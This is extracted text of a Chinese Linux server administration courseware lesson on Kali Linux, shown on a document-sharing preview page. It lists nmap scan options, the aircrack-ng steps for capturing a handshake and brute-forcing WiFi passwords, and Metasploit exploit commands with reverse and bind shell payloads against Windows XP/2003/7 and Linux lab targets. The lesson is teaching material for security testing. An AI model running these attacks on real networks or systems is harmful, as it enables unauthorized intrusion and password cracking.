《linux服務器配置與管理》課件15-任務十五 KALI操作系統的配置和使用_第1頁
《linux服務器配置與管理》課件15-任務十五 KALI操作系統的配置和使用_第2頁
《linux服務器配置與管理》課件15-任務十五 KALI操作系統的配置和使用_第3頁
《linux服務器配置與管理》課件15-任務十五 KALI操作系統的配置和使用_第4頁
《linux服務器配置與管理》課件15-任務十五 KALI操作系統的配置和使用_第5頁
已閱讀5頁,還剩29頁未讀 繼續免費閱讀

下載本文檔

版權說明:本文檔由用戶提供并上傳,收益歸屬內容提供方,若內容存在侵權,請進行舉報或認領

文檔簡介

任務十五:KALI操作系統的配置和使用15.1任務資訊15.1.1任務描述某單位在網絡安全檢查中,需要使用KALI操作系統,用于網絡安全檢測及調查取證。系統管理員在使用KALI過程中,需要使用安全漏洞檢測工具以及無線安全工具檢驗密碼強度及系統的強壯性。

15.1.2任務目標工作任務KALI服務器的安全工具使用學習目標掌握KALI服務器的安全工具使用實踐技能1.學習NMAP安全工具2.學習aircrack安全工具破解wifi密碼3.學習安全漏洞檢測工具攻擊windowsXP攻擊windows20034.使用安全漏洞檢測工具攻擊LINUX靶機攻擊windows7知識要點1.學習NMAP安全工具2.學習aircrack安全工具破解wifi密碼3.學習安全漏洞檢測工具攻擊windowsXP、windows20034.使用安全漏洞檢測工具攻擊LINUX、windows715.2決策指導1.無線網絡檢測2.滲透測試軟件檢測操作系統安全15.3制定計劃KaliLinux預裝了許多滲透測試軟件,包括nmap、Wireshark、JohntheRipper,以及Aircrack-ng等。01-InformationGathering(信息收集)02-VulnerabilityAssessment(弱點評估)03-WebApplicationAnalysis(Web應用程序分析)04-DatabaseAssessment(數據庫評估)05-PasswordAttacks(密碼攻擊)06-WirelessAttacks(無線攻擊)07-ReverseEngineering(逆向工程)08-ExploitationTools(滲透工具)09-Sniffing&Spoofing(嗅探和欺騙)10-PostExploitation(滲透以后)11-Forensics(取證工具)12-ReportingTools(報告工具)13-SocialEngineeringTools(社會工程工具)14-SystemServices(系統服務)Usualapplications(常用應用)15.4任務實施15.4.1學習NMAP安全工具1.在Kali系統上可以開啟SSH服務2.字典生成軟件crunch3.NMAP工具軟件Nmap常用

參數參

數說

明-sPping掃描,Nmap在掃描端口時,默認都會使用ping掃描-sL簡單列表掃描-sn使用PING主機方式-sV監測端口服務版本操作系統信息主機名等-sS半開掃描-sTTCP方式掃描,會在目標主機的日志中記錄大批連接請求和錯誤信息。-sUUDP掃描,UDP掃描是不可靠的-sA這項高級的掃描方法通常用來穿過防火墻的規則集-sF-sN秘密FIN數據包掃描、XmasTree、Null掃描模式-sC腳本掃描-A全面系統檢測、啟用腳本檢測、掃描等-O啟用遠程操作系統檢測,但可能存在誤報-V-v-v顯示掃描過程,推薦使用-PN掃描之前不使用ping命令-p指定端口,如“1-65535、1433、135、22、80、3389”等-h幫助文檔-T4針對TCP端口禁止動態掃描延遲超過10ms設置時間模板-iL讀取主機列表,“-iLD:\iplist.txt”-oN-oX-oG將報告寫入文件,分別是正常、XML、grepable三種格式-traceroute路由跟蹤掃描--script按照腳本分類進行掃描-6開啟IPv6掃描舉例(1)掃描指定IP所開放的端口:nmap-sS-p1-65535-v舉例(2)掃描C段存活主機:nmap-sP/24舉例(3)指定端口掃描:nmap-p80,1433,22,1521舉例(4)探測主機操作系統:nmap-o舉例(5)全面的系統探測:nmap-v-A(nmap默認掃描主機1000個高危端口)舉例(6)探測指定網段:nmap-10舉例(7)穿透防火墻進行掃描:nmap-Pn-A(禁止用ping的)舉例(8)使用腳本,掃描Web敏感目錄:nmap-p80--script=http-enum.nse15.4.2學習aircrack安全工具破解wifi密碼1.需要環境2.所需要命令(1)airmon-ng #命令檢查網卡是否支持監聽模式,使用airmon-ngcheckkill命令關閉無關進程(2)airmon-ngstartwlan0 #開啟無線網卡的監聽模式,使用iwconfig命令確認網卡為監聽模式(3)airodump-ngwlan0mon #搜索周圍的WiFi網絡(4)airodump-ng-c10--bssid00:27:19:4C:3F:6C-w90AB.capwlan0mon #抓取無線數據包(5)aireplay-ng-020-a00:27:19:4C:3F:6C-c7C:B2:32:1F:A9:0Ewlan0mon #攻擊已連接設備airodump-ng-c1--bssid00:27:19:6F:26:04-w2604wlan0monaireplay-ng-05-a00:27:19:6F:26:04-cA8:88:08:3f:AE:11wlan0mon(6)airmon-ngstopwlan0mon #停止抓包結束無線網卡的監聽模式(7)aircrack-ng-a2-b00:27:19:4C:3F:6C-w/usr/share/wordlist/rockyou.txt3F6C.cap #暴力破解指定文件包aircrack-ng-a2-b00:27:19:6F:26:04-wdie.txt2604其他可能用到的命令:ifconfig、iwconfig、airmon-ngcheckkill。暴力破解步驟開啟網關監聽模式確認網卡模式、掃描WIFI熱點抓取握手包、強制設備重連抓取到握手包、結束監聽模式獲得WIFI密碼15.4.3學習安全漏洞檢測工具攻擊windowsXP1.Metasploit工具Metasploit工具一般攻擊的過程:(1)獲得EIP指令寄存器。(2)插入shellcode代碼或填充數據獲取權限。(3)反向連接shell。即將目標主機當做服務,攻擊者機器作為客戶端。(4)添加用戶或進行其它操作。首先利用掃描器的插件探測目標系統的安全漏洞查找適用模塊選擇08-067模塊配置模塊、滲透成功執行命令:ps查看目標主機進程從控制端添加用戶hack3.滲透實操:攻擊windows2003useexploit/Windows/smb/ms08_067_netapisetpayloadwindows/meterpreter/reverse_tcpsetRHOST38setLHOST37settarget3配置參數、成功獲取session通過遠程桌面登錄4.滲透實操:攻擊linux靶機命令列表searchsambauseexploit/multi/samba/usermap_scriptShowpayloadsSetpayloadcmd/unix/bind_netcatShowoptionssetRHOST07exploit查找攻擊Samba的模塊選擇模塊、設定攻擊載荷5.滲透實操:通過10-046漏洞攻擊windows7對Windows7的掃描結果漏洞選擇查看參數、配置監聽地址攻擊載荷配置、開始攻擊打開會話本小節用到的命令useexploit/windows/browser/ms10_046_shortcut_icon_dllloadersetpayloadwindows/meterpreter/reverse_tcpsetSRVHOST37setRHOST36setLHOST37評價指標及評價內容★★★★★★評價方式基本操作20分部署KALI操作系統

教師評價開啟SSH學習crunch密碼工具

動手做20分(重現)學習aircrack安全工具

自我評

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯系上傳者。文件的所有權益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網頁內容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
  • 4. 未經權益所有人同意不得將文件中的內容挪作商業或盈利用途。
  • 5. 人人文庫網僅提供信息存儲空間,僅對用戶上傳內容的表現方式做保護處理,對用戶上傳分享的文檔內容本身不做任何修改或編輯,并不能對任何下載內容負責。
  • 6. 下載文件中如有侵權或不適當內容,請與我們聯系,我們立即糾正。
  • 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

最新文檔

評論

0/150

提交評論